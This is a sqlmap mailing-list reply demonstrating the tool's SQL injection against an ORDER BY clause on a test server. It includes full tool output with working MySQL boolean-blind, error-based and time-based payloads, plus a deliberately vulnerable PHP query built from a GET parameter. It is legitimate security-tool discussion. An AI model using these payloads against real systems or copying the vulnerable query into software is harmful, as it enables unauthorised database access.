Hi Jacco, On 27 April 2011 10:52, Jacco van Tuijl <jaccovantu...@gmail.com> wrote: > I've been writing some artikel about SQL injection in the ORDER BY clause: > http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ > > Would be nice to see that implemented in version 1.0 :)
sqlmap has support for injection in ORDER BY and GROUP BY clauses since 0.9-dev - about since 6 months or so now. Proof of concept: --8<-- $ python sqlmap.py -u http://debiandev/sqlmap/mysql/get_int_orderby.php?id=1 --level 3 --flush-session sqlmap/1.0-dev (r3772) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 00:49:02 [00:49:02] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev/session' as session file [00:49:02] [INFO] flushing session file [00:49:02] [INFO] testing connection to the target url [00:49:02] [INFO] heuristics detected web page charset 'ascii' [00:49:02] [INFO] testing if the url is stable, wait a few seconds [00:49:03] [INFO] url is stable [00:49:03] [INFO] testing if GET parameter 'id' is dynamic [00:49:03] [INFO] confirming that GET parameter 'id' is dynamic [00:49:04] [INFO] GET parameter 'id' is dynamic [00:49:04] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL) [00:49:04] [INFO] testing sql injection on GET parameter 'id' [00:49:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace' [00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)' [00:49:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' [00:49:04] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)' [00:49:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' [00:49:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' injectable [00:49:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [00:49:04] [INFO] testing 'MySQL > 5.0.11 stacked queries' [00:49:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [00:49:54] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [00:49:55] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 193 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (6096=6096) THEN 1 ELSE 6096*(SELECT 6096 FROM information_schema.tables) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=1 AND (SELECT 3210 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,110,102,58),(SELECT (CASE WHEN (3210=3210) THEN 1 ELSE 0 END)),CHAR(58,104,103,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --- [00:50:00] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5.0 [00:50:00] [INFO] Fetched data logged to text files under '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev' [*] shutting down at: 00:50:00 --8<-- As you can see it spotted three different SQL injection techniques against an ORDER BY clause injection point. The original query in the PHP page is: --8<-- $query = "SELECT * FROM users ORDER BY " . $_GET['id']; --8<-- Like I said, this has been tested thoroughly on MySQL and the others DBMS too. > I'm also interested in joining your dev. team. We can discuss it privately, drop us an email to d...@sqlmap.org. Regards, Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F ------------------------------------------------------------------------------ WhatsUp Gold - Download Free Network Management Software The most intuitive, comprehensive, and cost-effective network management toolset available today. Delivers lowest initial acquisition cost and overall TCO of any competing solution. http://p.sf.net/sfu/whatsupgold-sd _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
